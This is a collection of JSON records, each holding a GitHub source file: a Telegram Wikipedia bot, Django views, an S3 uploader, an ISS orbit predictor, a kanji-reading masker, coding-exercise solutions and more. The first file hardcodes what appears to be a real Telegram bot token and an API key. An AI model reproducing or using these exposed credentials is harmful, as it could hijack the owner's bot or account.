+{"seq_id":"11918512215","text":"import telebot\r\nfrom telebot import types\r\nimport wikipedia\r\nfrom googletrans import Translator\r\nimport time\r\nimport requests\r\n\r\n#token va modullarni cahqirish uchun\r\nadmin_id='-1001261577807'\r\napikey='-jgjTI4nQgb-UebbeCNF3unEFqaMyOAkDi_ZMBmlQIA'\r\nTOKEN=\"1546844166:AAF77WzEduNI6hIu-TgHkHYz8fBW-V83Vu8\"\r\nbot = telebot.TeleBot(TOKEN, parse_mode='HTML') # parse mode Html uchun ham o'tishi mumkin\r\ntranslator = Translator()\r\n\r\n#telegram keyboard uchun\r\nmarkup_inline=types.InlineKeyboardMarkup()\r\nitem_uz=types.InlineKeyboardButton(text='Uzbekcha 🇺🇿',callback_data='uz')\r\nitem_ru=types.InlineKeyboardButton(text='русский 🇷🇺',callback_data='ru')\r\nitem_report_problem=types.InlineKeyboardButton(text='❌Report❌',callback_data='report_problem')\r\nmarkup_inline.add(item_uz,item_ru,item_report_problem)\r\n\r\n#report problem uchun buttonlar\r\nmarkup_inline2=types.InlineKeyboardMarkup()\r\nitem_1=types.InlineKeyboardButton(text=\"Xato ma'lumot\",callback_data='report1')\r\nitem_2=types.InlineKeyboardButton(text=\"Error 404\",callback_data='report2')\r\nitem_3=types.InlineKeyboardButton(text=\"Rasm error\",callback_data='report3')\r\nmarkup_inline2.add(item_1,item_2,item_3)\r\n\r\n#botni boshlash funksiyasi\r\n@bot.message_handler(commands=['start'])\r\ndef send_welcome(message):\r\n global name\r\n global id\r\n name = message.from_user.first_name\r\n id=message.from_user.id\r\n print(name, id)\r\n bot.reply_to(message, '''Salom {}, bizning wikipedia_uz botiga xush kelibsiz. \r\n Wikipedia so'rovlarini jo'natishingiz mumkin.\r\n Masalan: Apple/Warsaw/Uzbekistan\r\n '''.format(name))\r\n bot.send_message(chat_id=admin_id,text='{} -botga kirdi!'.format(name))\r\n #reklama uchun funksiya 15 minut va 50 soatda jonatadi\r\n #bu funskiya xozir ishlamayapti \r\n #reklama jonatish funksiyasi\r\n\r\n@bot.message_handler(commands=['about'])\r\ndef send_about(message):\r\n bot.send_message(message.chat.id,'''\r\n Botimiz xaqida:\r\nMasalan:\r\n✅ Yangilangan sanasi- 08/02/2021\r\n✅ Dasturchi- @husanboy_us\r\n✅ Xamkorlik uchun - @husanboy_us\r\n✅ Bizning kanalimiz https://t.me/artofitt\r\n ''' )\r\n\r\n#asosiy funksiya yoki funskiyalar\r\n@bot.message_handler(func=lambda message: True)\r\ndef main_func(message):\r\n global get_wiki\r\n try:\r\n msg=message.text\r\n get_wiki=wikipedia.summary(msg, sentences=7)\r\n get_wiki_pics=wikipedia.page(msg).images[0]\r\n bot.send_message(message.chat.id,get_wiki,reply_markup=markup_inline )\r\n bot.send_photo(message.chat.id, photo=get_wiki_pics)\r\n except Exception :\r\n bot.send_message(message.chat.id, text=\"Nimadur xatolik yuz berdi. Aniq javob olshingiz uchun aniq so'rov kiriting 👇👇👇\")\r\n bot.send_message(message.chat.id,'''\r\n So'rovni Ingliz Tilida yozishni yoki tekshirishni unutmang!\r\nMasalan:\r\nTrump-❌❌❌ Donald Trump-✅✅✅\r\n ''' )\r\n \r\n#function gets inline data and translates to the given languages\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef query_text(call):\r\n global name\r\n global id\r\n if call.data=='uz':\r\n translation = translator.translate(get_wiki, dest='uz',)\r\n data_uz=translation.text\r\n bot.send_message(call.message.chat.id, data_uz) \r\n elif call.data=='ru':\r\n translation = translator.translate(get_wiki, dest='ru',)\r\n data_ru=translation.text\r\n bot.send_message(call.message.chat.id,data_ru)\r\n elif call.data=='report_problem':\r\n bot.send_message(call.message.chat.id, text=' 🔻🔻🔻 Xato turini tanlang! 🔻🔻🔻 ',reply_markup=markup_inline2)\r\n elif call.data=='report1':\r\n global name\r\n global id\r\n print('hello report 1')\r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n bot.send_message(chat_id=admin_id,text=\" Name: {} ID: {} -Reported code 1\".format(name,id))\r\n \r\n elif call.data=='report2':\r\n print('hello report 2')\r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n bot.send_message(chat_id=admin_id,text=\" Name: {} ID: {} -Reported code 2\".format(name,id))\r\n \r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n elif call.data=='report3':\r\n print('hello report 3')\r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n bot.send_message(chat_id=admin_id,text=\" Name: {} ID: {} -Reported code 3\".format(name,id))\r\n \r\n else:\r\n print('Not working query_text funskiyasida')\r\n\r\n\r\nbot.polling() \r\n#translation = translator.translate(result, dest='uz',)\r\n#bot.reply_to(message,translation,parse_mode=None)\r\n","repo_name":"HusanboyUs/wikipedia_telegram_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7644258234","text":"import sys\nip = sys.stdin.readline\n\nn = int(ip())\npi = sorted(list(map(int, ip().split())))\n\nres = 0\nfor i in range(n):\n res += (pi[i] * (n-i))\nprint(res)\n\n''' ATM\nATM 앞에 N명의 사람들이 줄서있다. \n사람들은 1 ~ N 번 까지 번호 매겨짐. i 번 사람이 돈을 인출하는데 걸리는 시간은 Pi분\n\n줄을 서는 순서에 따라서 인출하는데 필요한 시간의 합이 달라진다고? 그렇네\n1 2 3 4 5로 서면\n1\n1 2\n1 2 3\n1 2 3 4\n1 2 3 4 5\n\n이렇게 시간이 소요되니까\n암튼 총합 시간이 가장 작아지게 해라\n\n- 입력 -\n첫 줄에 사람 수 N, 둘째 줄에 각각 시간\n\n시간 1초 메모리 256MB\n\n--1트--: 이게 C3 문제야?\n그냥 뇌 비우고 생각하면 오름차순 정렬해서 사람 수 역순으로 곱해서 더해주면 되는거 아니냐?\n'''","repo_name":"NonokEE/Coding_study","sub_path":"BaekJoon Silver/S4_11399.py","file_name":"S4_11399.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7678797710","text":"from datetime import date, timedelta\n\nfrom django.core.management.base import BaseCommand\nfrom django.db.models.base import ObjectDoesNotExist\nfrom factory.fuzzy import FuzzyInteger, FuzzyNaiveDateTime\n\nfrom ...models import Category, Unit, User\nfrom ...tests.factories import SubstanceFactory\n\nimport datetime\n\n\nclass Command(BaseCommand):\n args = ' '\n help = 'Populate substance table with random dummy data.'\n\n def add_arguments(self, parser):\n parser.add_argument('username')\n parser.add_argument('upper_bound')\n parser.add_argument('substance_type')\n parser.add_argument('substance_unit')\n\n def handle(self, *args, **options):\n upper_bound = options['upper_bound']\n substance_type = options['substance_type']\n substance_unit = options['substance_unit']\n username = options['username']\n\n try:\n user = User.objects.get(name=username.lower())\n except ObjectDoesNotExist:\n user = User.objects.create(name=username.lower())\n\n try:\n category = Category.objects.get(name=substance_type.lower())\n except ObjectDoesNotExist:\n category = Category.objects.create(name=substance_type.lower())\n\n try:\n unit = Unit.objects.get(name=substance_unit.lower())\n except ObjectDoesNotExist:\n unit = Unit.objects.create(name=substance_unit.lower(), category=category)\n\n\n end_date = date.today()\n start_date = end_date - timedelta(days=7)\n for i in self.get_date_list(start_date, end_date):\n for _ in range(3):\n SubstanceFactory(\n user=user,\n unit=unit,\n category=category,\n record_date=i,\n record_time=FuzzyNaiveDateTime(datetime.datetime.now() - timedelta(hours=24)),\n value = FuzzyInteger(0, int(upper_bound))\n )\n\n def get_date_list(cls, start, end):\n delta = end - start\n return [(start + timedelta(days=i)) for i in range(delta.days+1)]\n","repo_name":"budiryan/urinalysis-app","sub_path":"backend/management/commands/load_random_substance_data.py","file_name":"load_random_substance_data.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42872664959","text":"from django.shortcuts import render\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom mysite2.baiduparser import BaiduPage\nfrom mysite2.datamgr import *\n\ndef index(request):\n names = {'wd':'app'}\n return render_to_response('index.html',names,context_instance=RequestContext(request))\n\ndef search(request):\n wd = request.GET['wd']\n #bdChecked = request.GET['baidu']\n p = BaiduPage()\n p.parse(wd)\n resultitems = p.getSiteItems()\n #resultitems = [{'title':'site1','desc':'site1 desc','url':'aa.com','pr':7,'baidurank':3,'alexa':133},\n # {'title':'sit2','desc':'site2 desc','url':'bb.com','pr':17,'baidurank':33,'alexa':1233}]\n searchpages = []\n for i in range(1,11):\n url = \"s/?wd=\" + wd\n url = \"%s&pn=%d\"%(url,i)\n searchpages.append({'name':i,'url':url})\n dict = {'wd':wd,'resultitems':resultitems,'searchpages':searchpages}\n return render_to_response('list.html',dict,context_instance=RequestContext(request))\n\ndef ajax(request):\n siteUrl = request.GET['siteUrl']\n siteUrl2 = \"http://\"+siteUrl\n q = request.GET['q']\n str = ''\n if q=='alexa':\n str = '%d'%(g_dataMgr.getAlexa(siteUrl2))\n elif q=='pr':\n str = '%d'%g_dataMgr.getPr(siteUrl)\n elif q=='sum':\n sum = g_dataMgr.getSiteSum(siteUrl2)\n str = sum['title']+\",\"+sum['desc']\n elif q=='baidurank':\n str = '%d'%g_dataMgr.getBaiduRank(siteUrl)\n return HttpResponse(str)","repo_name":"colenhyt/mysite2","sub_path":"mysite2/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22715104157","text":"import cv2\nimport mediapipe as mp\nimport os\n\nDATASET_DIR = \"../../Datasets/Guns_In_CCTV/VOC/\"\n\n\n\ntrain_files= []\nval_files= []\ntest_files= []\n\ndirs = [\"train\", \"valid\", \"test\"]\ndatas = [[], [] ,[]]\n\nfor i, d in enumerate(dirs):\n for f in os.listdir(DATASET_DIR + d + \"/\"):\n if f[-4:] == \".xml\":\n datas[i].append(d + \"/\" + f[:-4])\n with open(f\"CCTV/{d}.txt\", \"w\") as outfile:\n outfile.write(\"\\n\".join(datas[i]))\n","repo_name":"JoshVStaden/pistol_detection_with_yolo","sub_path":"annotate_dataset.py","file_name":"annotate_dataset.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38912737533","text":"import policy\nimport traceback\nimport logging\nimport monitoring\nimport itertools\nfrom .policy_registry import GetConfig\n\ndef ApplyPolicies(g):\n config = GetConfig()\n enabled = config.get('enabled', True)\n if enabled is not None and not enabled:\n return\n\n monitoring_db = monitoring.GetDatabase('spinbot')\n\n logging.info('Processing issues, repos')\n for i in itertools.chain(*[g.issues(), g.pull_requests(), g.repos()]):\n for p in policy.Policies():\n if p.applies(i):\n err = None\n try:\n p.apply(g, i)\n except Exception as _err:\n logging.warn('Failure applying {} to {}: {}'.format(\n p, i, traceback.format_exc()\n ))\n err = _err\n\n monitoring_db.write('issues_handled', { 'value': 1 }, tags={\n 'policy': p.id,\n 'error': err\n })\n","repo_name":"askulkarni2/spinnaker","sub_path":"spinbot/policy/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"8601042687","text":"import json\nimport os\n\nimport boto3\n\n\n# Helper function to get the extension of a filename.\ndef get_file_ext(path):\n return path.split('.')[-1]\n\n# Filename extension to meme-type map.\ncontent_type = {\n 'html': 'text/html',\n 'css': 'text/css',\n 'js': 'text/javascript',\n 'json': 'application/json',\n 'jpg': 'image/jpeg',\n 'jpeg': 'image/jpeg',\n 'png': 'image/png',\n 'txt': 'text/plain'\n}\n\nkeys = json.load(open('keys.json'))\n\nFILENAME = __file__\nROOT_DIR = os.path.abspath(os.path.dirname(FILENAME))\nOUTPUT_DIR = os.path.join(ROOT_DIR, keys['OUTPUT_DIR_NAME'])\nAWS_ACCESS_KEY_ID = keys['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = keys['AWS_SECRET_ACCESS_KEY']\n\n\ns3 = boto3.resource(\n 's3',\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY\n)\nbucket = s3.Bucket(keys['AWS_S3_BUCKET_NAME'])\n\n# Clear bucket before uploading.\nbucket.objects.all().delete()\nprint('Cleared bucket')\n\nfor current_dir, dirs, files in os.walk(OUTPUT_DIR):\n for file_ in files:\n # Build path of the file.\n path = os.path.join(current_dir, file_)\n # Build absolute path of the file.\n s3_path = path.replace('{}/'.format(OUTPUT_DIR), '')\n\n with open(path, 'rb') as data:\n # Get mime-type of file.\n try:\n ext = get_file_ext(s3_path)\n mime_type = content_type[ext]\n # Fallback to text/plain meme-type.\n except KeyError:\n mime_type = content_type['txt']\n\n # Upload file to bucket.\n bucket.put_object(Key=s3_path, Body=data, ContentType=mime_type)\n print('Uploaded {}: ({})'.format(s3_path, mime_type))\n","repo_name":"sjbitcode/sangeeta-blog","sub_path":"upload_to_s3.py","file_name":"upload_to_s3.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"23329252750","text":"# %% Imports\nfrom __future__ import annotations\nimport json\nfrom typing import Iterable, Tuple, SupportsFloat as Numeric\nimport os\nimport requests\nfrom tqdm import tqdm\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom datetime import datetime\nimport pytz\nimport ephem\nfrom dateutil.parser import parse\n# %%\ndict_dayofweek = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\ndict_mon = ['', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\ndef get_raw_tle_from_tstamp(ts: datetime | np.datetime64 | Iterable)->Tuple[datetime, str, str, str] | np.ndarray:\n if isinstance(ts, datetime):\n ts = datetime.utcfromtimestamp(ts.timestamp())\n elif isinstance(ts, np.datetime64):\n ts = datetime.utcfromtimestamp(int(ts)*1e-9)\n elif isinstance(ts, Iterable):\n out = []\n for t in tqdm(ts):\n out.append(get_raw_tle_from_tstamp(t))\n return np.asarray(out).T\n\n dayofweek = dict_dayofweek[ts.weekday()]\n day = ts.day\n mon = dict_mon[ts.month]\n year = ts.year\n hh = ts.hour\n mm = ts.minute\n ss = ts.second\n\n url = f'http://isstracker.com/ajax/fetchTLE.php?date={dayofweek}%2C%20{day}%20{mon}%20{year}%20{hh}%3A{mm}%3A{ss}%20GMT'\n\n content = requests.get(url)\n if content.status_code != 200:\n raise RuntimeError('Response %d'%(content.status_code))\n tledict = json.loads(content.content)\n epoch = tledict['epoch']\n lines = tledict['jsTLE'].replace('\\r', '').split('\\n')\n return (parse(epoch + '+00:00'), lines[0], lines[1], lines[2])\n\n# %%\ndef EpochFromTle(line_1: str) -> datetime:\n t = line_1[18:32] # epoch\n year = int(t[:2]) # first two digits\n if year > 56: # first launch in 57 so 57 is 1957\n year += 1900\n else: # < 56: 56 -> 2056\n year += 2000\n\n yday = int(t[2:5]) # day of year\n fday = float(t[5:]) # fractional day of year\n \n start = pytz.utc.localize(datetime(year, 1, 1)) # first day of the year\n tstamp = start.timestamp()\n tstamp += (yday - 1)*86400 # add seconds spent per day\n tstamp += fday*86400 # fraction of day to seconds\n return datetime.utcfromtimestamp(tstamp)\n# %%\ndef staticvars(**kwargs):\n def decorate(func):\n for key in kwargs:\n setattr(func, key, kwargs[key])\n return func\n return decorate\n\n@staticvars(tledb=None, tlefile='')\ndef ISSTleFromTstamp(ts: datetime, *, database_fname: str = None, allowdownload: bool=True, full_output: bool=False) -> Tuple[str, str] | Tuple[str, str, datetime, bool, int]:\n \"\"\"Get TLE for a given timestamp using ISS TLE database.\n\n Args:\n ts (datetime): Timestamp for evaluation, must be in UTC case of datetime.\n database_fname (str, optional): TLE dataset file (loaded using xarray.load_dataset). The dataset file must contain a timestamp (coordinate) for when the TLE is valid, and data_vars line1 and line2 containing the two TLE lines. Defaults to 'ISS_TLE_DB.nc'.\n allowdownload (bool, optional): Allow download of TLE not found in DB.\n full_output (bool, optional): Return full output (line1, line2, epoch, found, idx). Defaults to False.\n\n Raises:\n ValueError: Timestamp must be timezone aware.\n IndexError: Could not find valid TLE in the dataset (allowdownload=False, full_output=False).\n RuntimeError: Could not download valid TLE (allowdownload=True, database does not contain valid epoch).\n\n Returns:\n Tuple[str, str] | Tuple[str, str, datetime, bool, int]: (line1, line2) or (line1, line2, datetime, found, idx) if full_output=True.\n \"\"\"\n if ISSTleFromTstamp.tledb is None or ISSTleFromTstamp.tlefile != database_fname:\n if database_fname is None:\n database_fname = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ISS_TLE_DB.nc')\n ISSTleFromTstamp.tledb = xr.load_dataset(database_fname)\n ISSTleFromTstamp.tlefile = database_fname\n\n tledb: xr.Dataset = ISSTleFromTstamp.tledb\n\n tle_tstamps = tledb.timestamp.values.astype(int)*1e-9\n lows = np.diff(np.asarray(tle_tstamps < ts.timestamp(), dtype=int))\n\n if np.sum(lows) == 0: # no transitions => not found\n if allowdownload: # download is allowed\n _, _, l1, l2 = get_raw_tle_from_tstamp(ts) # get the TLE\n if full_output:\n return (l1, l2, ts, False, -1)\n else: return (l1, l2)\n elif full_output:\n return (None, None, ts, False, -1)\n else:\n raise IndexError('Could not find valid TLE.') # no can do\n else: # already in DB\n idx = np.where(lows != 0)[0]\n dts = tledb.timestamp.values[idx]\n tles = tledb.sel(dict(timestamp=dts))\n l1 = tles.line1.values[0]\n l2 = tles.line2.values[0]\n if full_output:\n return (l1, l2, dts[0], True, idx)\n else: return (l1, l2)\n# %%\ndef ISSLatLonFromTstamp(ts: datetime | np.datetime64, *, database_fname: str = None, allowdownload: bool=True) -> Tuple[Numeric, Numeric, Numeric]:\n \"\"\"Get latitude, longitude for a given timestamp using ISS TLE database.\n\n Args:\n ts (datetime | np.datetime64): Timestamp for evaluation, must be timezone aware in case of datetime.\n database_fname (str, optional): TLE dataset file (loaded using xarray.load_dataset). The dataset file must contain a timestamp (coordinate) for when the TLE is valid, and data_vars line1 and line2 containing the two TLE lines. Defaults to 'ISS_TLE_DB.nc'.\n allowdownload (bool, optional): Allow download of TLE not found in DB.\n\n Raises:\n ValueError: Timestamp must be timezone aware.\n IndexError: Could not find valid TLE in the dataset (allowdownload=False).\n RuntimeError: Could not download valid TLE (allowdownload=True, database does not contain valid epoch).\n\n Returns:\n Tuple[Numeric, Numeric, Numeric]: (latitude, longitude, altitude) in degrees (-180, 180) and km.\n \"\"\"\n if isinstance(ts, datetime):\n if ts.tzinfo is None:\n raise ValueError('Timestamp must be timezone aware')\n ts = datetime.utcfromtimestamp(ts.astimezone(tz = pytz.utc).timestamp())\n elif isinstance(ts, np.datetime64):\n ts = datetime.utcfromtimestamp(int(ts)*1e-9)\n l1, l2 = ISSTleFromTstamp(ts, database_fname=database_fname, allowdownload=allowdownload)\n tle = ephem.readtle('GENERIC', l1, l2)\n try:\n tle.compute(ts)\n except Exception as e:\n outstr = f'Could not compute TLE for {ts} (epoch {EpochFromTle(l1)}): {str(e)}\\n'\n raise RuntimeError(outstr)\n return (np.rad2deg(float(tle.sublat)), np.rad2deg(float(tle.sublong)), tle.elevation*1e-3)\n# %%\nif __name__ == '__main__':\n ts = pytz.timezone('US/Eastern').localize(datetime(2017, 4, 1, 0, 0, 1))\n print(ts, ISSTleFromTstamp(ts, full_output=True)[2:])\n print(ts, ISSLatLonFromTstamp(ts))\n# %%\n","repo_name":"sunipkm/skmpython","sub_path":"skmpython/SatPosPredict/_pospredict.py","file_name":"_pospredict.py","file_ext":"py","file_size_in_byte":6902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39265794655","text":"from loader import bot\nfrom utils.json_worker.users import delete_admin, get_admins, get_users, give_admin\n\n\nasync def action_Aadd(callback):\n admin_to_add_user_id = callback.data.split('?')[1]\n sender_user_id = callback.data.split('?')[2]\n add_admin_username = (await get_users())[admin_to_add_user_id]['username']\n await give_admin(admin_to_add_user_id)\n await callback.answer(\"Действие подтверждено\")\n await callback.message.delete()\n await bot.send_message(chat_id=sender_user_id,\n text=f\"Ваше предложение добавить адммина {add_admin_username} было выполнено.\")","repo_name":"SNI4/tg_filmbot","sub_path":"handlers/callbacks_actions/Aadd.py","file_name":"Aadd.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21778645218","text":"def uniquePaths(m, n):\n matrix = []\n matrix.append([1]*n)\n for i in range(1, m):\n row = [0]*n\n for j in range(n):\n if j == 0: row[j] = 1\n else: row[j] = row[j-1] + matrix[i-1][j]\n matrix.append(row)\n print(matrix)\n return matrix[-1][-1]\n\ndata = [\n (3, 7),\n (3, 2),\n (7, 3),\n (3, 3)\n]\nfor test_tuple in data:\n print(uniquePaths(*test_tuple))\n","repo_name":"pratikdk/dsaprobs_s1","sub_path":"array/12_62_unique_paths.py","file_name":"12_62_unique_paths.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6898816073","text":"import pickle\nimport utils.stringutils as stringutils\nimport os\nfrom utils.params import *\n\nwith open(os.path.join(ROOT_DIR, \"bin_blobs/JMdict_e_hashtable.pkl\"), 'rb') as f:\n word_dict = pickle.load(f)\n\nwith open(os.path.join(ROOT_DIR, \"bin_blobs/kanjidic2_hashtable.pkl\"), 'rb') as f:\n kanji_dict = pickle.load(f)\n\nwith open(os.path.join(ROOT_DIR, \"translator_subsystem/masked_kanji.pkl\"), 'rb') as f:\n masked_kanji_set = pickle.load(f)\n\n\nclass NoValidCombinationOfReadingsFoundError(Exception):\n pass\n\n\ndef find_exact_match(keb: str):\n return word_dict[keb]\n\n\ndef translate_sequence_recursively(sequence: str, n_leading_kanji: int):\n # print(\"trying to translate {}\".format(sequence))\n if sequence == \"\" or n_leading_kanji <= 0:\n return [(len(sequence), sequence, sequence)]\n current_len = len(sequence)\n while current_len > 0:\n try:\n reading = find_exact_match(sequence[:current_len])\n remaining_readings = translate_sequence_recursively(sequence[current_len:], n_leading_kanji - current_len)\n remaining_readings.append((current_len, sequence[:current_len], reading))\n return remaining_readings\n except KeyError:\n current_len -= 1\n raise KeyError\n\n\ndef translate_sequence(sequence: str, n_leading_kanji: int):\n current_len = len(sequence)\n while current_len > 0:\n try:\n translation = translate_sequence_recursively(sequence[:current_len], min(n_leading_kanji, current_len))\n translation.reverse()\n # translation = translation[:-1]\n return current_len, translation\n except KeyError:\n current_len -= 1\n return 0, []\n\n\ndef requires_masking(kanji: str):\n return kanji in masked_kanji_set\n\n\ndef find_masking_positions(keb: str):\n masking_positions = []\n for i_tmp in range(len(keb)):\n if requires_masking(keb[i_tmp]):\n masking_positions.append(i_tmp)\n return masking_positions\n\n\ndef segment_reading_recursively(reading: str, keb: str, include_name_readings: bool = False):\n\n # end of recursion reached, create list and pass upward if reading characters were used up,\n # raise exception otherwise\n if keb == \"\":\n if reading == \"\":\n return []\n else:\n raise NoValidCombinationOfReadingsFoundError\n\n # process the last kanji in keb\n kanji = keb[len(keb)-1]\n # get all readings\n readings, readings_nanori = kanji_dict[kanji]\n # if name readings are to be included, add them to the rear of the list of normal readings\n if include_name_readings:\n readings += readings_nanori\n # find a matching reading that allows for the rest of the word to still be segmented correctly\n for partial_reading in readings:\n # if this reading of the kanji fits the end of the current portion of the word, try it\n if reading.endswith(partial_reading):\n try:\n # try to segment the remainder of the word\n segmented_reading = segment_reading_recursively(\n reading[:-len(partial_reading)], keb[:-1], include_name_readings=include_name_readings\n )\n # if successful, append this partial_reading and return\n segmented_reading.append(partial_reading)\n return segmented_reading\n # if the rest of the reading was not correctly segmentable, pass this partial_reading and try the next one\n except NoValidCombinationOfReadingsFoundError:\n continue\n\n # none of the readings for this kanji fitted or allowed for the remainder of the word to be segmented,\n # pass exception upward\n raise NoValidCombinationOfReadingsFoundError\n\n\ndef segment_reading(reading: str, keb: str, n_leading_kanji: int, include_name_readings: bool = False):\n if n_leading_kanji < len(keb):\n number_of_trailing_hiragana = len(keb) - n_leading_kanji # >= 1\n segmented_reading = segment_reading_recursively(\n reading[:-number_of_trailing_hiragana], keb[:-number_of_trailing_hiragana],\n include_name_readings=include_name_readings\n )\n # if successful, append this partial_reading and return\n segmented_reading.append(reading[-number_of_trailing_hiragana:])\n return segmented_reading\n else:\n return segment_reading_recursively(reading, keb, include_name_readings=include_name_readings)\n\n\ndef mask_word(reading: str, keb: str, n_leading_kanji: int):\n masking_positions = find_masking_positions(keb)\n if not masking_positions: # eq. masking_positions == []\n return reading\n try:\n segmented_reading = segment_reading(reading, keb, n_leading_kanji)\n except NoValidCombinationOfReadingsFoundError:\n segmented_reading = segment_reading(reading, keb, n_leading_kanji, include_name_readings=True)\n\n # mask reading of hidden kanji\n for position in masking_positions:\n # \"maru\" for censored character. note that one '〇' can cover several kana, but always exactly one kanji\n segmented_reading[position] = \"〇\"\n\n # join modified segmented reading into single string\n masked_reading = \"\"\n for partial_reading in segmented_reading:\n masked_reading += partial_reading\n\n return masked_reading\n\n\ndef translate_and_mask_sequence(sequence: str, n_leading_kanji: int):\n used_chars, translated_sequence = translate_sequence(sequence=sequence, n_leading_kanji=n_leading_kanji)\n masked_sequence = []\n n_leading_lanji_tmp = n_leading_kanji\n for word in translated_sequence:\n n_leading_kanji_local = min(len(word[1]), n_leading_lanji_tmp)\n try:\n masked_reading = mask_word(reading=word[2], keb=word[1], n_leading_kanji=n_leading_kanji_local)\n except NoValidCombinationOfReadingsFoundError: # if no valid combination of basic readings found...\n if all(requires_masking(kanji) for kanji in word[1][:n_leading_kanji_local]):\n masked_reading = \"\".join([\"〇\" for _ in range(n_leading_kanji_local)])\n else:\n masked_reading = word[2]\n # reduce leading kanji count so it representes the number of leading kanji in the remaining sequence\n n_leading_lanji_tmp -= min(len(word[1]), n_leading_lanji_tmp)\n masked_sequence.append((word[0], word[1], masked_reading))\n return masked_sequence # used_chars, masked_sequence\n\n\ndef translate_and_mask_line(line: str):\n \"\"\"\n translate and mask a whole line (several concatenated sequences)\n :param line: the line to translate\n :return: the list of translated and masked sequences, each with their length (char count) and leading kanji count\n \"\"\"\n current_sequence_start = 0\n last_char_was_kana = False\n translated_and_masked_sequences = []\n number_of_kanji = 0\n # process each char\n for i in range(len(line)):\n # if current char is kana, mark it as such and continue\n if stringutils.is_kana(line[i]):\n last_char_was_kana = True\n # if it is kanji...\n else:\n # ... and the last char was kana, this is the beginning of a new sequence, and the old/finished sequence\n # can be processed and saved\n if last_char_was_kana:\n # translate this sequence and save it\n translated_and_masked_sequences.append(\n (\n translate_and_mask_sequence(line[current_sequence_start:i], number_of_kanji),\n i - current_sequence_start,\n number_of_kanji\n )\n )\n # reset kanji counter, set start index of next sequence\n current_sequence_start = i\n number_of_kanji = 1\n # ... otherwise, just count the kanji\n else:\n number_of_kanji += 1\n # and mark this char as kanji for the next iteration\n last_char_was_kana = False\n # translate the last sequence and save it\n translated_and_masked_sequences.append(\n (\n translate_and_mask_sequence(line[current_sequence_start:], number_of_kanji),\n len(line) - current_sequence_start,\n number_of_kanji\n )\n )\n return translated_and_masked_sequences\n\n\n\ndef overwrite_masked_kanji_set(new_set: set):\n global masked_kanji_set\n masked_kanji_set = new_set\n\n\ndef reset_masked_kanji_set():\n global masked_kanji_set\n with open(os.path.join(ROOT_DIR, \"translator_subsystem/masked_kanji.pkl\"), 'rb') as f:\n masked_kanji_set = pickle.load(f)\n\n\nif __name__ == \"__main__\":\n\n print(translate_and_mask_sequence(\"日本語\", 3))\n","repo_name":"011000101101/VRAR_project","sub_path":"translator_subsystem/lut_translator.py","file_name":"lut_translator.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27630282921","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# #### Imports\r\n\r\n# In[1]:\r\n\r\nfrom __future__ import print_function\r\n\r\nimport sys\r\nimport os\r\nimport urllib\r\nimport gzip\r\nimport pickle\r\nimport numpy as np\r\nfrom os.path import dirname\r\nimport random\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.init as init\r\nimport torch.utils.data\r\nimport torchvision\r\nimport torchvision.datasets as dset\r\nimport torchvision.transforms as transforms\r\nimport torch.nn.functional as F\r\n\r\n\r\n\r\n\r\n# In[2]:\r\n\r\n\r\n# #### Variables and parameters\r\n\r\n# In[3]:\r\n\r\n# Sourse and target datasets can be set here manually\r\n\r\ns = 'mnist'\r\nt = 'usps'\r\nroot_dir = '~/dataset'\r\n\r\nprocs = 2\r\nbatchsize = 128 \r\ntot_iter = 30000 # number of epochs \r\nz_dim = 100 # dimension of random noise\r\nlrCl = 0.0002 # learning rate \r\nlrGen = 0.0002 # learning rate \r\nbeta1 = 0.5 # beta1 for adam. 0.5)\r\nbeta2 = 0.999 # beta2 for adam\r\nweight_decay = 0.0005 # weight_decay\r\n\r\nt_iter = 500 # testiter\r\n\r\n\r\n# 